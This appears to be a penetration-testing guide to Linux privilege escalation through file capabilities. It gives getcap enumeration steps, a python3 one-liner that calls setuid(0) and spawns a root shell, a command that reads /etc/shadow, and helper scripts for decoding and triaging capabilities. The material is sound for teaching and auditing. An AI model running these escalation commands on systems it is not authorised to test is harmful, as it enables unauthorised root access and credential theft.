# Capabilities

### Overview

Linux **capabilities** split the traditional all-or-nothing root privilege into distinct units that can be held by a process or attached to an executable as *file capabilities*, so a program is handed only the privilege it actually needs.

Instead of making a binary SUID root, an administrator can grant it specific capabilities such as:

* `cap_setuid`
* `cap_net_bind_service`
* `cap_sys_admin`
* `cap_dac_override`

File capabilities are stored in the `security.capability` extended attribute of the binary and are managed with the libcap tools:

```bash
setcap   # set, or remove with -r, the file capabilities of a binary
getcap   # print the file capabilities of a binary; -r recurses into directories
```

Although capabilities exist to avoid handing out full root via SUID, **a powerful capability attached to a binary that lets the caller run arbitrary code is a privilege-escalation path in its own right**.

### Why this Works

Traditionally:

* If a binary is SUID root, every execution of it runs with full root privileges, whatever the program does.

With capabilities:

* A binary runs with **only the specific privileged operations it was granted**
* Even when executed by a low-privileged user, because file capabilities are applied at `exec`, much like the SUID bit

The problem occurs when both of the following hold:

* The binary carries a powerful capability such as `cap_setuid` in its effective set
* The binary lets the caller run arbitrary code or spawn a shell (interpreters, editors, debuggers and the like)

A binary that is merely writable is not the shortcut it looks like: writing to the file makes the kernel drop its `security.capability` attribute, just as it clears the SUID bit, so the finding that matters is the combination above.

For example, if `/usr/bin/python3` has:

```bash
cap_setuid+ep
```

the flags mean the capability is in the file's permitted (`p`) and effective (`e`) sets, so every `python3` process starts with CAP_SETUID already usable. Any code the attacker runs through the interpreter can then switch to UID 0 and spawn a shell:

```python
import os

os.setuid(0)            # allowed because the process holds CAP_SETUID
os.system("/bin/bash")  # the shell inherits real and effective UID 0
```
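Before relying on the payload above it is worth confirming that the interpreter really started with the capability in its *effective* set, rather than trusting `getcap` alone: `/proc/<pid>/status` reports `CapInh`, `CapPrm`, `CapEff`, `CapBnd` and `CapAmb` as hex bitmasks. The shell snippet below is an added example, not part of the original checklist; it decodes the low 22 bits of such a mask into capability names (higher-numbered capabilities are omitted) and the sample masks are constructed.

```bash
#!/bin/sh
# Added example: decode the capability bitmasks that /proc/<pid>/status reports
# (CapInh, CapPrm, CapEff, CapBnd, CapAmb) into capability names.
# Not part of the original checklist; the sample masks below are constructed.

# Names for bits 0..21 in kernel numbering (linux/capability.h). Higher bits
# exist (cap_sys_boot, cap_sys_nice, ...) but are omitted here; every
# capability in the table on this page falls inside this range.
CAP_NAMES="cap_chown cap_dac_override cap_dac_read_search cap_fowner cap_fsetid \
cap_kill cap_setgid cap_setuid cap_setpcap cap_linux_immutable \
cap_net_bind_service cap_net_broadcast cap_net_admin cap_net_raw cap_ipc_lock \
cap_ipc_owner cap_sys_module cap_sys_rawio cap_sys_chroot cap_sys_ptrace \
cap_sys_pacct cap_sys_admin"

# decode_caps <hexmask>: print one capability name per line for each set bit.
decode_caps() {
    mask=$1
    bit=0
    for name in $CAP_NAMES; do
        if [ $(( (0x$mask >> bit) & 1 )) -eq 1 ]; then
            printf '%s\n' "$name"
        fi
        bit=$((bit + 1))
    done
}

# effective_caps: decode CapEff of the calling shell. Run it from inside the
# process you care about, e.g. the shell spawned by the python3 payload above.
effective_caps() {
    [ -r /proc/self/status ] || { echo "no /proc/self/status here" >&2; return 1; }
    decode_caps "$(awk '/^CapEff:/ {print $2}' /proc/self/status)"
}

# Constructed sample masks in the format /proc/<pid>/status uses:
#   0000000000000080  -> bit 7 only (a python3 holding just cap_setuid+ep)
#   0000000000200082  -> bits 1, 7 and 21
echo "== mask 0000000000000080 =="
decode_caps 0000000000000080
echo "== mask 0000000000200082 =="
decode_caps 0000000000200082
echo "== CapEff of this shell =="
effective_caps || true
```

An unprivileged shell normally prints nothing for its own `CapEff`; a shell spawned from a `python3` that carries `cap_setuid+ep` shows `cap_setuid` there, which is what makes `os.setuid(0)` succeed.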

### Common Dangerous Capabilities

| Capability              | Why It's Dangerous                                                                                     |
| ----------------------- | ------------------------------------------------------------------------------------------------------ |
| cap\_setuid             | `setuid(0)` from any code the binary runs → root shell                                                 |
| cap\_setgid             | Change GID; lets the process join privileged groups and read or write group-protected files            |
| cap\_dac\_override      | Bypass discretionary (mode-bit) read, write and execute checks; read or modify files regardless of owner |
| cap\_sys\_admin         | Catch-all for mount, namespace and many other privileged operations; close to full root                |
| cap\_net\_bind\_service | Bind ports below 1024; not an escalation by itself, but lets an unprivileged process pose as a privileged service |
| cap\_sys\_ptrace        | Attach to and inject into processes of other users, including root                                     |

### Steps

1. Find binaries with file capabilities (`getcap` may live in `/sbin` or `/usr/sbin` and not be on the PATH):

   ```bash
   getcap -r / 2>/dev/null
   ```
2. Look for dangerous capabilities in the output. The flag letters after the name matter: `e` effective, `p` permitted, `i` inheritable. A process receives a file capability at `exec` only if it is in the permitted set, and can use it immediately only if it is also effective, so `cap_setuid+ep` is the interesting case; a bare `+p` means the program would first have to raise the capability itself.
3. Example 1:

   If `getcap` reports either of the following (older libcap prints `path = caps`, newer libcap prints `path caps`):

   ```bash
   /usr/bin/python3 = cap_setuid+ep
   /usr/bin/python3 cap_setuid=ep
   ```

   Exploit:

   ```bash
   python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
   ```
4. Example 2:

   If the interpreter has:

   ```bash
   cap_dac_override+ep
   ```

   you can read files regardless of their permission bits, for example:

   ```bash
   python3 -c 'print(open("/etc/shadow").read())'
   ```
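On a real host `getcap -r /` returns a long list dominated by harmless entries (`cap_net_raw` on `ping`, for instance), so the procedure above benefits from a filter that keeps only binaries holding one of the capabilities from the table with the effective flag set. The script below is an added example, not part of the original checklist; it handles both `getcap` output formats and the sample output it runs on is constructed, not captured from any system.

```bash
#!/bin/sh
# Added example: triage the output of `getcap -r / 2>/dev/null` and list only
# binaries that hold a dangerous capability in their Effective set.
# Not part of the original checklist; the sample output below is constructed.
#
# Handles both getcap output formats:
#   /usr/bin/python3 = cap_setuid+ep       (older libcap)
#   /usr/bin/python3 cap_setuid=ep         (newer libcap)
# and the clause syntax both use: clauses are space-separated and the
# comma-separated capabilities inside a clause share one flag set, e.g.
#   /usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep

# The capabilities from the table on this page; extend as needed.
DANGEROUS="cap_setuid,cap_setgid,cap_dac_override,cap_sys_admin,cap_net_bind_service,cap_sys_ptrace"

# triage_caps: reads getcap lines on stdin and prints "<path> <capability>" for
# every dangerous capability whose flags include e (effective). Capabilities
# that are only permitted (+p) are skipped: the program would have to raise
# them itself before they could be used.
triage_caps() {
    while IFS= read -r line; do
        [ -n "$line" ] || continue
        # normalise the older "path = caps" form to "path caps"
        case "$line" in *" = "*) line="${line%% = *} ${line#* = }" ;; esac
        path=${line%% *}
        rest=${line#* }
        [ "$rest" != "$line" ] || continue      # no capability text on this line
        for clause in $rest; do
            case "$clause" in
                *=*) caps=${clause%%=*}; flags=${clause#*=} ;;
                *+*) caps=${clause%%+*}; flags=${clause#*+} ;;
                *)   continue ;;
            esac
            case "$flags" in *e*) ;; *) continue ;; esac
            for cap in $(printf '%s' "$caps" | tr ',' ' '); do
                case ",$DANGEROUS," in
                    *",$cap,"*) printf '%s %s\n' "$path" "$cap" ;;
                esac
            done
        done
    done
}

# Constructed sample in both output formats (not real output from any host):
SAMPLE_GETCAP='/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.10 = cap_setuid+ep
/usr/bin/gst-ptp-helper cap_net_bind_service,cap_net_admin=ep
/usr/local/bin/backup cap_dac_override=p
/usr/bin/perl cap_setuid,cap_sys_ptrace=eip'

printf '%s\n' "$SAMPLE_GETCAP" | triage_caps
# Live use:  getcap -r / 2>/dev/null | triage_caps
```

On the constructed sample this reports `python3.10` (`cap_setuid`), `gst-ptp-helper` (`cap_net_bind_service`) and `perl` (`cap_setuid` and `cap_sys_ptrace`), and drops `ping` and the `backup` tool whose `cap_dac_override` is permitted but not effective. Treat a hit as a lead to verify by hand, since whether the binary lets you run code is still a manual judgement.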


